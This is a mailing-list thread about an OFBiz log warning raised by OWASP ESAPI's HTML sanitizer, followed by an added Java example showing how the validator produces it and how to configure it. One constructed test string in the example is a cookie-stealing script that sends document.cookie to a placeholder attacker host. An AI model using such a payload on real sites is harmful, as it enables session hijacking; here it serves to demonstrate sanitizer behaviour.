Could someone explain this to me?

Could someone explain this to me?

Ruth Hoffman-2
version 803418 (9.04)
Where is this log messaging coming from? What framework or other
component is generating it? And under what types of conditions?

Aug 13, 2009 7:56:49 PM AppNameNotSpecified IntrusionDetector
WARNING: SECURITY-FAILURE Anonymous@unknown:unknown -- Invalid HTML
input: context=body, errors=[The <b>table</b> tag has been filtered for
security reasons. The contents of the tag will remain in place., The
<b>tr</b> tag has been filtered for security reasons. The contents of
the tag will remain in place., The <b>th</b> tag has been filtered for
security reasons. The contents of the tag will remain in place., The
<b>tr... *[THIS PART REMOVED]* ...contents of the tag will remain in
place., The <b>td</b> tag has been filtered for security reasons. The
contents of the tag will remain in place.]
    ValidationException @
org.owasp.esapi.reference.DefaultValidator.getValidSafeHTML(null:-1)

Thanks
Ruth

Reply | Threaded
Open this post in threaded view
|

Re: Could someone explain this to me?

Bob Morley
Hi Ruth,

I believe this is the standard OFBiz validation of incoming parameters to a service.  It appears this is used when the incoming parameter has been marked to allow only "safe" HTML.  The implementation makes use of the DefaultValidator below and can be configured by changing an XML file.  Here is the comment in the code:

Based on the ESAPI validator configured in the antisamy-esapi.xml file.

So from this I would gauge that you had put something in your screen and then clicked to post that information to the server.  One of the fields from your form post contains some characters that the validator deemed not to be "safe".  This type of stuff is usually to guard against SQL injection and such ... My guess is that you pasted some HTML into a textarea and tried to do a save?

Re: Could someone explain this to me?

Ruth Hoffman-2
Hi Bob:
Thanks for the response. Based on your answer, I'm wondering when OFBiz
started doing this and where in the code or configuration files I can go
to remove this logging. Could this be part of scrubbing that is done as
a precursor to using the sendMail service? I'm trying to figure out
where this is happening. I am posting some text from a textarea. And I'm
saving that and then formatting and sending an email with some of that
content.

Thanks again.
Ruth
Re: Could someone explain this to me?

Jacques Le Roux
Administrator
From: "Ruth Hoffman" <[hidden email]>
> Hi Bob:
> Thanks for the response. Based on your answer, I'm wondering when OFBiz started doing this

This effort began around November 2008 and "ended" (not totally complete, say 98%, see
https://issues.apache.org/jira/browse/OFBIZ-1525 for instance) around March 2009

>and where in the code/or configuration files I can go to remove this logging.

I'm afraid there is nothing currently in OFBiz to remove this kind of logging. It may be doable and is a part of ESAPI
(http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API)


>Could this be part of scrubbing  that is done as a precursor to using the sendMail service?

No, it's not specifically related to that.

Jacques

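As an added example (not code from this thread, from OFBiz or from ESAPI), the Java below shows the call behind the log line Bob and Jacques describe. A parameter that may carry only "safe" HTML is handed to ESAPI's Validator, which runs it through the AntiSamy policy in antisamy-esapi.xml. AntiSamy is an HTML sanitizer, so what this check guards against is HTML and script injection (XSS) in stored text. Any tag the policy does not allow, table/tr/th/td here, yields a "tag has been filtered" finding; ESAPI wraps the findings in a ValidationException, and the constructor of every ESAPI exception passes it to ESAPI.intrusionDetector().addException(), which is the method that writes the "IntrusionDetector WARNING: SECURITY-FAILURE ... Invalid HTML input: context=body, errors=[...]" entry. The Anonymous@unknown:unknown prefix is the user@host:session tag ESAPI's logger adds for an unauthenticated request, and AppNameNotSpecified is the application name ESAPI falls back to when none is configured. That is why the logging cannot be removed on the OFBiz side: it lives inside ESAPI. The example assumes ESAPI 2.x with ESAPI.properties and antisamy-esapi.xml on the classpath; the context name "body" mirrors the log line and both HTML samples are constructed for the demo. Whether a filtered tag ends in an exception (as in the 2009 stack trace above) or in a cleaned string that is only logged depends on the ESAPI release and, from 2.2 on, on the Validator.HtmlValidationAction setting, so the code handles both paths.

```java
import org.owasp.esapi.ESAPI;
import org.owasp.esapi.ValidationErrorList;
import org.owasp.esapi.errors.ValidationException;

/*
 * Added example, not OFBiz or ESAPI project code. It assumes ESAPI 2.x on the
 * classpath with ESAPI.properties and antisamy-esapi.xml (the AntiSamy policy
 * that DefaultValidator loads) resolvable by ESAPI. The context "body" mirrors
 * the log line in this thread; both HTML samples are constructed for the demo.
 */
public class SafeHtmlCheckDemo {

    // Constructed sample: a pasted table, the kind of input behind the
    // "table/tr/th/td tag has been filtered" findings in the log above.
    static final String PASTED_TABLE =
        "<p>Totals</p><table><tr><th>Item</th><td>42</td></tr></table>";

    // Constructed sample: the case the check is really there for.
    static final String SCRIPT_ATTEMPT =
        "<p>hi</p><script>document.location='http://attacker.invalid/?c='+document.cookie</script>";

    static final int MAX_LEN = 10000;

    /** One check's result: cleaned markup, or the ESAPI log message when it threw. */
    static final class Outcome {
        final String cleaned;  // null when the validator threw instead of cleaning
        final String failure;  // "Invalid HTML input: context=..., errors=[...]" or null
        Outcome(String cleaned, String failure) {
            this.cleaned = cleaned;
            this.failure = failure;
        }
    }

    /**
     * The same call made for a parameter that may carry only "safe" HTML.
     * How a filtered tag ends depends on the ESAPI release (and, from 2.2 on,
     * Validator.HtmlValidationAction): the 2009 code in this thread threw
     * ValidationException, which is the stack trace in the log; other releases
     * return the cleaned string and only log. Both paths are handled here.
     * IntrusionException (too many failures for the configured threshold) is a
     * RuntimeException and is deliberately left to propagate.
     */
    static Outcome checkSafeHtml(String context, String html) {
        try {
            String cleaned = ESAPI.validator().getValidSafeHTML(context, html, MAX_LEN, false);
            return new Outcome(cleaned, null);
        } catch (ValidationException e) {
            // By the time this catch runs the line has already been logged:
            // ESAPI's exception constructor hands every ValidationException to
            // ESAPI.intrusionDetector().addException(), which writes the
            // "IntrusionDetector WARNING: SECURITY-FAILURE ..." entry.
            return new Outcome(null, e.getLogMessage());
        }
    }

    /**
     * The non-throwing overload: findings are appended to the list and "" is
     * returned instead of an exception. The ValidationException is still built
     * inside ESAPI, so the SECURITY-FAILURE line is still written. This changes
     * the caller's control flow, not what gets logged.
     */
    static ValidationErrorList collectFindings(String context, String html) {
        ValidationErrorList errors = new ValidationErrorList();
        ESAPI.validator().getValidSafeHTML(context, html, MAX_LEN, false, errors);
        return errors;
    }

    /*
     * If tables are legitimately expected in "body", widen the policy instead of
     * muting the detector: add, under <tag-rules> in antisamy-esapi.xml,
     *   <tag name="table" action="validate"/>
     *   <tag name="tr" action="validate"/>
     *   <tag name="th" action="validate"/>
     *   <tag name="td" action="validate"/>
     * The warning then stops for tables but still fires for <script> and the
     * like, which is the signal the IntrusionDetector exists to raise.
     */

    public static void main(String[] args) {
        for (String sample : new String[] { PASTED_TABLE, SCRIPT_ATTEMPT }) {
            Outcome o = checkSafeHtml("body", sample);
            System.out.println(o.failure == null ? "cleaned: " + o.cleaned : "rejected: " + o.failure);
            for (ValidationException ve : collectFindings("body", sample).errors()) {
                System.out.println("  finding for " + ve.getContext() + ": " + ve.getLogMessage());
            }
        }
    }
}
```

Two caveats for anyone tempted to just make the line go away. Later ESAPI 2.x releases do have a global switch, IntrusionDetector.Disable=true in ESAPI.properties, but it silences every intrusion event, not only this one, and the same log line for a <script> tag in a customer-supplied field is exactly the detection you want to keep. Extending the AntiSamy policy for the tags the application really needs, as in the comment in the block, keeps the signal and stops the noise. The OFBiz side marks such parameters in the service definition (allow-html="safe", as far as I recall; treat that attribute name as my assumption rather than something this thread states).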